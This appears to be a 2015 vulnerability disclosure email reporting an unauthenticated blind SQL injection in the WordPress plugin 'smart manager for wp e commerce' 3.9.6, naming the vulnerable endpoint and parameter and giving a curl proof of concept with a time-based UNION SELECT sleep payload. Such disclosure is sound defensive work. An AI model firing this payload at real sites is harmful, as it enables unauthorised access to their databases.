Subject: Blind SQL injection in smart manager for wp e commerce 3.9.6
Date: Wed, 8 Jul 2015 18:45:02 +0200

Hello,

Plugin: smart manager for wp e commerce 3.9.6 https://wordpress.org/plugins/smart-manager-for-wp-e-commerce/

Unauthenticated remote attackers can execute arbitrary SQL commands.

1. SQL injection (woo_insert_update_data())

Method: POST
Url: http://localhost/wp-content/plugins/smart-manager-for-wp-e-commerce/sm/woo-json.php
Vulnerable parameter: edited

Example PHP callstack:

woo-json.php [/smart-manager-for-wp-e-commerce/sm/woo-json.php:3078]
woo_insert_update_data [/smart-manager-for-wp-e-commerce/sm/woo-json.php:2659]
wpdb::get_results

Verification:

curl --request POST  --data "cmd=saveData&edited=[{\"id\":\" 1) union select sleep(10),2; -- -\"}]" http://localhost/wp-content/plugins/smart-manager-for-wp-e-commerce/sm/woo-json.php

-- 
Regards,
Marcin Probola,